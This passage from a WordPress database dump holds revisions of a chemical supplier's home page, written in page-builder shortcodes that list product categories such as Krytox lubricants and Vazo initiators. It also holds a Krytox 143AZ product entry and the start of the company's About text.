text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:25:08', '2016-08-18 15:25:08', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (448, 1, '2016-08-18 15:32:09', '2016-08-18 15:32:09', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sliding-glass" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:32:09', '2016-08-18 15:32:09', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (449, 1, '2016-08-18 15:32:59', '2016-08-18 15:32:59', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:32:59', '2016-08-18 15:32:59', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (450, 1, '2016-08-18 15:34:03', '2016-08-18 15:34:03', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:34:03', '2016-08-18 15:34:03', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (451, 3, '2017-06-15 19:24:57', '2017-06-15 19:24:57', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="ABOUT US" color="white" style="outline" size="xlarge" radius="62" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built mold release agents, specialty coatings or unique formulations. Our engineering department can design a optimized solution for your application needs.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur fully stocked USA &amp; Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Eco-Friendly</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\r\n\r\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys™ </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-autosave-v1', '', '', '2017-06-15 19:24:57', '2017-06-15 19:24:57', '', 64, 'https://132.148.10.86/wordpress/64-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (452, 2, '2016-08-19 13:15:42', '2016-08-19 13:15:42', '', '143AZ', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.', 'publish', 'open', 'closed', '', 'krytox-143az', '', '', '2016-10-26 19:54:22', '2016-10-26 19:54:22', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=452', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (453, 3, '2016-08-18 15:39:33', '2016-08-18 15:39:33', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:39:33', '2016-08-18 15:39:33', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (454, 1, '2016-08-18 15:40:52', '2016-08-18 15:40:52', '[row]\r\n\r\n[col span="1/2"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="218" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n<h3>You are invited!</h3>\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam 